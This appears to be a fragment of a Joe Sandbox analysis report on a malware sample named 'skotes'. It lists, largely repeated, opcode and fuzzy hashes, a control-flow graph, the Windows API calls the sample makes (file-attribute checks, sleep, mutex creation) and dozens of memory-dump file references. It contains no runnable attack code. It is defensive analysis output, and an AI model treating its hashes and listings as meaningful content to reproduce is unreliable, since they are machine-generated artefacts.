                                                                                                                • Opcode ID: 5ee3c3b47fe6e97819f9fa7cb96e5272fa07affdb4e04a73897ebe8962552a52
                                                                                                                • Instruction ID: 91cc526e5f58b9234bde4a71a941c145190ee8b5b4e3d47b743df269a624952d
                                                                                                                • Opcode Fuzzy Hash: 5ee3c3b47fe6e97819f9fa7cb96e5272fa07affdb4e04a73897ebe8962552a52
                                                                                                                • Instruction Fuzzy Hash: 54310731B44244EBFB18ABB8DC8DB6DBB72ABC6310F24421EE0549B3D5D73D59808752

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1715 78a2e3-78a303 GetFileAttributesA 1718 78a331-78a34d 1715->1718 1719 78a305-78a311 1715->1719 1722 78a37b-78a39a 1718->1722 1723 78a34f-78a35b 1718->1723 1720 78a313-78a321 1719->1720 1721 78a327-78a32e call 79d663 1719->1721 1720->1721 1726 78a93a 1720->1726 1721->1718 1724 78a3c8-78a916 call 7980c0 1722->1724 1725 78a39c-78a3a8 1722->1725 1728 78a35d-78a36b 1723->1728 1729 78a371-78a378 call 79d663 1723->1729 1731 78a3aa-78a3b8 1725->1731 1732 78a3be-78a3c5 call 79d663 1725->1732 1735 78a953-78a987 Sleep CreateMutexA 1726->1735 1736 78a93a call 7b6c6a 1726->1736 1728->1726 1728->1729 1729->1722 1731->1726 1731->1732 1732->1724 1744 78a98e-78a994 1735->1744 1736->1735 1745 78a996-78a998 1744->1745 1746 78a9a7-78a9a8 1744->1746 1745->1746 1747 78a99a-78a9a5 1745->1747 1747->1746 1749 78a9a9-78a9b0 call 7b6629 1747->1749
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 0078A2E6
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: d67332af538ea0ebdc20a3a00957423994ce602570c24cef0671b54eaa91f697
                                                                                                                • Instruction ID: 4b58c797ca58bcc622c784ab9930deb90ef88aca5a2e49ebf2a50f075a95a78b
                                                                                                                • Opcode Fuzzy Hash: d67332af538ea0ebdc20a3a00957423994ce602570c24cef0671b54eaa91f697
                                                                                                                • Instruction Fuzzy Hash: E3314C31B84240EBFB18AB78DC8D76DBB72EB96310F20821EE0149B7D5D73D99808712
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 0078A41B
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: 24cc29b40924bd87d2c7212ee1bfbfff81c17d41ee2b76e06ce09ccfa885b5b3
                                                                                                                • Instruction ID: 996d5184de4d5e41ee193855549615838b28ac1ad2a85320b59d1a604430b29c
                                                                                                                • Opcode Fuzzy Hash: 24cc29b40924bd87d2c7212ee1bfbfff81c17d41ee2b76e06ce09ccfa885b5b3
                                                                                                                • Instruction Fuzzy Hash: 60312B31B44140EBFF18ABBCD88D76DBA61EB85310F20421AE058DB3D6D77D59808762
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 0078A550
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: 906b8a0022529633cdd44000ae66da9233dd5f28bd11794f7981d9f822637e60
                                                                                                                • Instruction ID: a94bfc7f3ebc97bebc9eada0836c4f5894c0197220231f912207f40837885794
                                                                                                                • Opcode Fuzzy Hash: 906b8a0022529633cdd44000ae66da9233dd5f28bd11794f7981d9f822637e60
                                                                                                                • Instruction Fuzzy Hash: D5313931B45140EBFB18EBB8DC8DB6CBB61EB85314F24421AE0549B3D6DB3D9D808712
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 0078A685
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: 9728f3d1c4ed317fad9e55290ee506f46426f5f00261f098d56067e7eba51a2d
                                                                                                                • Instruction ID: 073111105e5da501ed49d83af8b27bf39d799aa0b98106ef7ed9c4870aee8d0c
                                                                                                                • Opcode Fuzzy Hash: 9728f3d1c4ed317fad9e55290ee506f46426f5f00261f098d56067e7eba51a2d
                                                                                                                • Instruction Fuzzy Hash: F7312771744244EBFB18AB78DC8DB6DBB72EB85320F24825AE0149B2D6D73D99808752
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 0078A7BA
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
